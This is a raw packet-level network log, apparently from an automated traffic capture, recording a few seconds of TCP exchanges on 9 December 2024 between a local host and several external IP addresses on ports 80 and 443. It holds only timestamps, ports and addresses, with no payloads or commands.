                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.725610018 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.726001024 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.726479053 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.726491928 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.726526022 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.726563931 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.727339983 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.727395058 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.727559090 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.727596045 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.728075027 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.728085041 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.728121042 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.728144884 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.728816986 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.728903055 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.728910923 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.728946924 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.729695082 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.729729891 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.729871035 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.729914904 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.730544090 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.730587006 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.730633020 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.730670929 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.731386900 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.731458902 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.731498957 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.732351065 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.732393980 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.732445002 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.732484102 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.733135939 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.733185053 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.733200073 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.733237982 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.734030962 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.734078884 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.734108925 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.734148026 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.735068083 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.735155106 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.735203028 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.735872030 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.735923052 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.735955000 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.735996962 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.736599922 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.736641884 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.736799955 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.736841917 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.737472057 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.737517118 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.737593889 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.737632990 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.738305092 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.738408089 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.738445997 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.739223003 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.739264011 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.739319086 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.739355087 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.740077019 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.740117073 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.740118027 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.740151882 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.740953922 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.740994930 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.741033077 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.741816044 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.741858006 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.741858006 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.741897106 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.742686033 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.742724895 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.742753983 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.742789030 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.743530989 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.743591070 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.743654013 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.743693113 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.744525909 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.744564056 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.744596004 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.744631052 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.745445013 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.745487928 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.745508909 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.745544910 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.746165991 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.746217012 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.746248007 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.746280909 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.747060061 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.747159958 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.747203112 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.747911930 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.747953892 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.747980118 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.748022079 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.748728991 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.748769045 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.748795986 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.748835087 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.749604940 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.749614954 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.749643087 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.749655962 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.896917105 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.897022963 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.897205114 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.897341967 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.897397041 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.897425890 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.897485971 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.898252010 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.898300886 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.898374081 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.898416996 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.899085045 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.899132013 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.899322987 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.899367094 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.899380922 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.899419069 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.900233030 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.900283098 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.900336027 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.900382042 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.901088953 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.901135921 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.901170015 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.901215076 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.901987076 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.902033091 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.902112961 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.902157068 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.902874947 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.902959108 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.903001070 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.903762102 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.903837919 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.903887033 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.904599905 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.904649019 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.904824018 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.904867887 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.905472994 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.905539036 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.905570030 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.905606985 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.906306028 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.906394005 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.906438112 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.907263994 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.907308102 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.907337904 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.907377005 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.908062935 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.908102989 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.908238888 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.908277035 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.908934116 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.908987999 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.909044981 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.909785986 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.909837008 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.909943104 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.909986973 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.910654068 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.910698891 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.910725117 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.910763025 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.911555052 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.911607027 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.911663055 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.911709070 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.912364006 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.912415028 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.912467957 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.912508965 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.913264036 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.913307905 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.913336992 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.913382053 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.914176941 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.914228916 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.914259911 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.914298058 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.915036917 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.915065050 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.915116072 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.915936947 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.915992975 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.915997982 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.916034937 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.916707993 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.916759968 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.916763067 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.916798115 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.917584896 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.917648077 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.917678118 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.917721987 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.918474913 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.918592930 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.918637037 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.919404030 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.919534922 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.919581890 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.920321941 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.920382023 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.920388937 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.920420885 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.921062946 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.921129942 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.921165943 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.922204971 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.922245979 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.922326088 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.922367096 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:20.216454029 CET44349884172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:20.216536045 CET49884443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:20.217981100 CET49884443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:20.217993021 CET44349884172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:20.218250036 CET44349884172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:20.219494104 CET49884443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:20.219608068 CET49884443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:20.219639063 CET44349884172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:20.219791889 CET49884443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:20.267338037 CET44349884172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:21.248073101 CET44349884172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:21.248167038 CET44349884172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:21.248317957 CET49884443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:21.250420094 CET49884443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:21.250443935 CET44349884172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:21.565195084 CET49891443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:21.565222025 CET44349891172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:21.565299988 CET49891443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:21.565588951 CET49891443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:21.565604925 CET44349891172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:22.284420967 CET4986880192.168.2.6185.215.113.43
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:22.284722090 CET4989280192.168.2.6185.215.113.43
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:22.404278994 CET8049892185.215.113.43192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:22.404378891 CET4989280192.168.2.6185.215.113.43
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:22.404504061 CET8049868185.215.113.43192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:22.404563904 CET4986880192.168.2.6185.215.113.43
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:22.736102104 CET4989280192.168.2.6185.215.113.43
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:22.780230045 CET44349891172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:22.780335903 CET49891443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:22.798926115 CET49891443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:22.798943043 CET44349891172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:22.799194098 CET44349891172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:22.800673008 CET49891443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:22.800920010 CET49891443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:22.800956011 CET44349891172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:22.801017046 CET49891443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:22.801027060 CET44349891172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:22.855416059 CET8049892185.215.113.43192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:23.695744991 CET44349891172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:23.695838928 CET44349891172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:23.695988894 CET49891443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:23.706846952 CET49891443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:23.706857920 CET44349891172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:23.795254946 CET8049892185.215.113.43192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:23.795327902 CET4989280192.168.2.6185.215.113.43
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:23.799025059 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:23.918344975 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:23.918416023 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:23.919569969 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:24.038861990 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:24.131336927 CET49899443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:24.131354094 CET44349899172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:24.131464005 CET49899443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:24.131867886 CET49899443192.168.2.6172.67.139.78
